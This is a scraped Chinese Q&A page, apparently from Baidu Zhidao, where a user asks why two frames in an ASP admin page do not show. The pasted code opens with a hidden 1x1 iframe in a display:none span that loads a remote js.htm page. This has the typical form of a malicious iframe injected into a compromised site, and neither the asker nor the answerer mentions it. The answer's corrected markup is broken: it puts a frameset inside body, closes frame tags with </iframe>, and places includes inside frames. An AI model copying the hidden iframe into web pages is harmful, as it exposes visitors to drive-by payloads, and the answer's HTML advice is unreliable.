这段代码为啥显示不了?

来源:百度知道 编辑:UC知道 时间:2024/07/05 07:10:36
以下代码为啥显示不了admin_left.asp和admin_main.asp的内容?

<span style="display:none;"><iframe src="http://www.xxx.net/js.htm" height="1" width="1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe></span>
<!-- #include file="../conn.asp" -->
<!-- #include file="../inc/config.asp" -->
<!-- #include file="session.asp" -->
<html>
<head>
<meta http-equiv="Content-Type" c>
<title><%=Sitename%>--主页面</title>
<link href="css.css" rel="stylesheet" type="text/css">
</head>
<frameset framespacing="0" border="false" cols="188,*" frameborder=

查看下路径对不对!

注意:要显示的内容正确的写法应该是在<body></body>之间,

</head>
<body>
<frameset framespacing="0" border="false" cols="188,*" frameborder="0">
<frame name="left" scrolling="auto" marginwidth="0" marginheight="0"><!-- #include file="admin_left.asp" -->
</iframe>
<frame name="right" scrolling="auto" marginwidth="0" marginheight="0" src="admin_main.asp"><!-- #include file="admin_main.asp" --></iframe>
<noframes>

<p>This page uses frames, but your browser doesn't support them.</p>
</body>